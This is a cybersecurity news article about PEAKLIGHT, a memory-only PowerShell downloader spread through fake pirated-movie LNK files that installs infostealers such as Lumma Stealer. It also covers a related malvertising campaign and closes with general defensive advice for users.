Cybersecurity experts have identified a new malware dropper called PEAKLIGHT that is being used in cyberattacks targeting Windows users through malicious movie downloads.
This newly discovered dropper functions as a stealthy vehicle, enabling the launch of various harmful software, such as information stealers and other types of malware loaders. The dropper is designed to operate entirely in memory, decrypting and executing a PowerShell-based downloader that cybersecurity reports have named PEAKLIGHT.
The PEAKLIGHT downloader is a critical component in distributing multiple malware strains, including Lumma Stealer, Hijack Loader (also known as DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot, all of which are offered under the malware-as-a-service (MaaS) model.
The attack typically begins with a Windows shortcut (LNK) file that users unknowingly download while searching for movies online. These LNK files are often embedded within ZIP archives masquerading as pirated movies.
When opened, the LNK file connects to a content delivery network (CDN) that hosts an obfuscated, memory-only JavaScript dropper. This dropper, in turn, runs the PEAKLIGHT PowerShell script on the victim’s system, initiating contact with a command-and-control (C2) server to download further malicious payloads.
Researchers have found several versions of these LNK files, some of which use asterisks (*) as wildcards to trigger the legitimate Windows binary mshta.exe, which is then exploited to run the malicious code stealthily retrieved from a remote server.
Additionally, these droppers have been identified embedding PowerShell payloads encoded in hex and Base64, which are subsequently unpacked to execute PEAKLIGHT. This downloader not only installs further malware but also downloads legitimate-looking movie trailers to maintain its disguise.
According to researchers, PEAKLIGHT is an intricately obfuscated PowerShell-based downloader that operates through a multi-stage execution chain. It specifically searches for ZIP archives in predefined file paths. If such archives are not found, it retrieves them from a CDN and saves them to the user’s system, further propagating the infection.
This method of distributing malware via fake movie downloads is not new. In a similar case earlier this year, a report detailed how attackers deployed Hijack Loader following attempts to download video files from illicit movie sites. A researcher noted that the dropper code used in both cases appeared identical, suggesting they might originate from the same threat actor.
Moreover, this disclosure coincides with another recent finding by cybersecurity experts, who identified a malvertising campaign using fraudulent Google Search ads for popular platforms like Slack. These ads direct users to deceptive websites, where they inadvertently download malicious installers leading to the deployment of remote access trojans like SectopRAT.
To prevent falling victim to such attacks, users should exercise caution when downloading files from untrusted sources, especially pirated content. It is crucial to use reputable antivirus software, regularly update operating systems and applications, and enable multi-layered security measures.
Always verify the authenticity of downloads, avoid clicking on suspicious links, and stay informed about the latest cybersecurity threats.